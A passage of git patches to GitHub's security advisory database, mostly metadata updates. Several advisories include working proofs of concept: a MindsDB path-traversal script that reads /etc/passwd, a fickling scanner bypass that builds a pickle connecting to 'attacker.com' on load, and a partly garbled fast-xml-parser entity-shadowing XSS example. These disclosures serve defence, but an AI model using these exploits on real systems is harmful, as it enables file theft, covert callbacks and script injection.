+1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xxvh-5hwj-42pp", - "modified": "2026-02-18T22:44:10Z", + "modified": "2026-02-20T16:47:26Z", "published": "2026-02-18T22:44:10Z", "aliases": [ "CVE-2026-27007" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xxvh-5hwj-42pp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27007" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/41ded303b4f6dae5afa854531ff837c3276ad60b" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:10Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file From f6494f1a4f4661254296f58a760f406893cd6eed Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:52:09 +0000 Subject: [PATCH 10/77] Publish Advisories GHSA-pmc3-p9hx-jq96 GHSA-5pqf-54qp-32wx GHSA-6xmx-xr9p-58p7 --- .../2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json | 8 ++++++-- .../2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json | 8 ++++++-- .../2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json | 8 ++++++-- 3 files changed, 18 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json b/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json index de8e5f675b2de..3025a6f960fc8 100644 --- a/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json +++ b/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pmc3-p9hx-jq96", - "modified": "2026-02-18T23:34:53Z", + "modified": "2026-02-20T16:51:12Z", "published": "2025-04-23T14:43:44Z", "aliases": [ "CVE-2026-26994" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-pmc3-p9hx-jq96" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26994" + }, { "type": "WEB", "url": "https://github.com/refraction-networking/utls/issues/181" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-04-23T14:43:44Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json index 39b124c867160..73c3c3c48bb22 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqf-54qp-32wx", - "modified": "2026-02-18T22:07:19Z", + "modified": "2026-02-20T16:51:51Z", "published": "2026-02-18T22:07:19Z", "aliases": [ "CVE-2026-26991" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26991" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19041" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:07:19Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:15:59Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json b/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json index 6644b4c8f35d5..52c2040a43f33 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json +++ b/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6xmx-xr9p-58p7", - "modified": "2026-02-18T22:30:32Z", + "modified": "2026-02-20T16:50:54Z", "published": "2026-02-18T22:30:32Z", "aliases": [ "CVE-2026-26989" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26989" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19039" @@ -67,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:30:32Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file From f0ae703719aa116dc60e7fef6a639be68f4a9dab Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:53:55 +0000 Subject: [PATCH 11/77] Publish Advisories GHSA-3ppc-4f35-3m26 GHSA-7m29-f4hw-g2vx GHSA-93fx-g747-695x --- .../2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json | 8 ++++++-- .../2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json | 8 ++++++-- .../2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json | 8 ++++++-- 3 files changed, 18 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json index c5475ba875463..e62b787b379c0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3ppc-4f35-3m26", - "modified": "2026-02-18T22:38:11Z", + "modified": "2026-02-20T16:52:14Z", "published": "2026-02-18T22:38:11Z", "aliases": [ "CVE-2026-26996" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, { "type": "WEB", "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:38:11Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json b/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json index bc6b085a5779c..5116ac941a5d1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json +++ b/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7m29-f4hw-g2vx", - "modified": "2026-02-18T22:33:18Z", + "modified": "2026-02-20T16:52:07Z", "published": "2026-02-18T22:33:18Z", "aliases": [ "CVE-2026-27017" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-7m29-f4hw-g2vx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27017" + }, { "type": "WEB", "url": "https://github.com/refraction-networking/utls/commit/24bd1e05a788c1add7f3037f4532ea552b2cee07" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:33:18Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json b/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json index b1c8b72181209..cea6ca4d42f29 100644 --- a/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json +++ b/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-93fx-g747-695x", - "modified": "2026-02-18T22:07:42Z", + "modified": "2026-02-20T16:51:59Z", "published": "2026-02-18T22:07:42Z", "aliases": [ "CVE-2026-26992" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26992" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19042" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:07:42Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:00Z" } } \ No newline at end of file From 9e37ed428b8d7931673a18f2ebd2eff14e3b75df Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:55:56 +0000 Subject: [PATCH 12/77] Publish GHSA-qqhf-pm3j-96g7 --- .../2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json b/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json index 5e49b10ba6950..d935cb378b4d6 100644 --- a/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json +++ b/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qqhf-pm3j-96g7", - "modified": "2026-01-20T18:22:20Z", + "modified": "2026-02-20T16:54:21Z", "published": "2026-01-12T16:10:55Z", "aliases": [ "CVE-2025-68472" ], "summary": "MindsDB has improper sanitation of filepath that leads to information disclosure and DOS", - "details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. Severity: High.\n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.", + "details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. \n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n4. Detailed report is available on BlueRock's blog: https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.", "severity": [ { "type": "CVSS_V3", @@ -51,6 +51,10 @@ { "type": "WEB", "url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.11.1" + }, + { + "type": "WEB", + "url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal" } ], "database_specific": { From 6ecbb5d81416845a005f1975cc1ad6996ffcc41f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 18:25:10 +0000 Subject: [PATCH 13/77] Publish Advisories GHSA-83pf-v6qq-pwmr GHSA-m7jm-9gc2-mpf2 --- .../GHSA-83pf-v6qq-pwmr.json | 63 +++++++++++++++++ .../GHSA-m7jm-9gc2-mpf2.json | 69 +++++++++++++++++++ 2 files changed, 132 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json diff --git a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json new file mode 100644 index 0000000000000..b624bac6e6e65 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83pf-v6qq-pwmr", + "modified": "2026-02-20T18:24:46Z", + "published": "2026-02-20T18:24:46Z", + "aliases": [], + "summary": "Fickling has a detection bypass via stdlib network-protocol constructors", + "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` are added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. `UnusedVariables` sees `_var0` as unused and raises `SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fickling" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-83pf-v6qq-pwmr" + }, + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/pull/233" + }, + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade" + }, + { + "type": "PACKAGE", + "url": "https://github.com/trailofbits/fickling" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:24:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json new file mode 100644 index 0000000000000..00a2eb0601e16 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7jm-9gc2-mpf2", + "modified": "2026-02-20T18:23:54Z", + "published": "2026-02-20T18:23:54Z", + "aliases": [ + "CVE-2026-25896" + ], + "summary": "fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names", + "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (`<`, `>`, `&`, `"`, `'`) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n regx: RegExp(`&${entityName};`, \"g\"),\n val: val\n};\n```\n\nAn entity named `l.` produces the regex `/&l.;/g` where `.` matches **any character**, including the `t` in `<`. Since DOCTYPE entities are replaced before built-in entities, this shadows `<` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`), and in the v6 codebase - `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^&*()<>|+\"; // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/&l.;/g` | `<` |\n| `g.` | `/&g.;/g` | `>` |\n| `am.` | `/&am.;/g` | `&` |\n| `quo.` | `/&quo.;/g` | `"` |\n| `apo.` | `/&apo.;/g` | `'` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `\n\">\n]>\n\n Hello <b>World</b>\n`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello b>World/b>\n```\n\nNo special parser options needed - `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page (e.g. `innerHTML`, template interpolation, SSR), the injected `` fires.\n\n`&` can be shadowed too:\n\n```js\nconst xml2 = `\n\n]>\nSELECT * FROM t WHERE name='O&Brien'`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT 